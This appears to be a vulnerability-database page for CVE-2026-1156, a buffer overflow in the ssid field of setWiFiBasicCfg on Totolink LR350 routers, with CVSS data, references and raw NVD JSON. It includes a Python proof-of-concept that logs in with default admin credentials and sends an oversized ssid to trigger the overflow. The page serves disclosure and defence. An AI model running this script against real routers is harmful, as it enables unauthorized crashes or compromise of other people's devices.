CVE-2026-1156

Description

A vulnerability was determined in Totolink LR350 9.3.5u.6369_B20220309. Affected by this issue is the function setWiFiBasicCfg of the file /cgi-bin/cstecgi.cgi. This manipulation of the argument ssid causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:totolink:lr350_firmware:9.3.5u.6369_b20220309:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:totolink:lr350:-:*:*:*:*:*:*:* - NOT VULNERABLE

Totolink LR350 9.3.5u.6369_B20220309

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-1156 PoC - Totolink LR350 Buffer Overflow in setWiFiBasicCfg
Note: This PoC is for educational and security research purposes only.
"""

import requests
import sys

target_host = "http://192.168.10.1"  # Change to target router IP
login_url = f"{target_host}/cgi-bin/cstecgi.cgi"

# Prepare long ssid payload to trigger buffer overflow
# The exact overflow length depends on firmware version
buffer_size = 1024  # Adjust based on target
ssid_payload = "A" * buffer_size

def exploit_cve_2026_1156():
    """Exploit the buffer overflow in setWiFiBasicCfg function"""
    
    # Step 1: Login to the router
    login_data = {
        "topicurl": "login",
        "username": "admin",  # Default username
        "password": "admin"   # Default password
    }
    
    session = requests.Session()
    try:
        login_response = session.post(login_url, json=login_data, timeout=10)
        print(f"[+] Login attempt: {login_response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Login failed: {e}")
        return False
    
    # Step 2: Send malicious ssid payload to trigger overflow
    exploit_data = {
        "topicurl": "setWiFiBasicCfg",
        "ssid": ssid_payload,
        "enable": "1",
        "channel": "6",
        "mode": "802.11bgn"
    }
    
    try:
        response = session.post(login_url, json=exploit_data, timeout=10)
        print(f"[+] Exploit payload sent (length: {len(ssid_payload)})")
        print(f"[+] Response status: {response.status_code}")
        return True
    except Exception as e:
        print(f"[*] Request completed with: {e}")
        return True

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2026-1156 PoC - Totolink LR350 Buffer Overflow")
    print("=" * 60)
    exploit_cve_2026_1156()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1156
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1156
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1156/
[4] VulDB https://vuldb.com/cve/CVE-2026-1156
[5] https://lavender-bicycle-a5a.notion.site/TOTOLINK-LR350-setWiFiBasicCfg-2e453a41781f80a2ad43e85bf5d46659?source=copy_link
[6] https://vuldb.com/?ctiid.341750
[7] https://vuldb.com/?id.341750
[8] https://vuldb.com/?submit.735722
[9] https://www.totolink.net/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1156", "sourceIdentifier": "[email protected]", "published": "2026-01-19T14:15:49.950", "lastModified": "2026-01-29T18:40:14.233", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Totolink LR350 9.3.5u.6369_B20220309. Affected by this issue is the function setWiFiBasicCfg of the file /cgi-bin/cstecgi.cgi. This manipulation of the argument ssid causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized."}, {"lang": "es", "value": "Se determinó una vulnerabilidad en Totolink LR350 9.3.5u.6369_B20220309. Afectada por este problema está la función setWiFiBasicCfg del archivo /cgi-bin/cstecgi.cgi. Esta manipulación del argumento ssid causa desbordamiento de búfer. Es posible iniciar el ataque de forma remota. El exploit ha sido divulgado públicamente y puede ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:totolink:lr350_firmware:9.3.5u.6369_b20220309:*:*:*:*:*:*:*", "matchCriteriaId": "6E7C618F-D415-4075-96A5-45E44B52FB62"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:totolink:lr350:-:*:*:*:*:*:*:*", "matchCriteriaId": "4CA0663B-3F55-44EF-AF32-F83AB0411748"}]}]}], "references": [{"url": "https://lavender-bicycle-a5a.notion.site/TOTOLINK-LR350-setWiFiBasicCfg-2e453a41781f80a2ad43e85bf5d46659?source=copy_link", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.341750", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341750", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.735722", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.totolink.net/", "source": "[email protected]", "tags": ["Product"]}]}}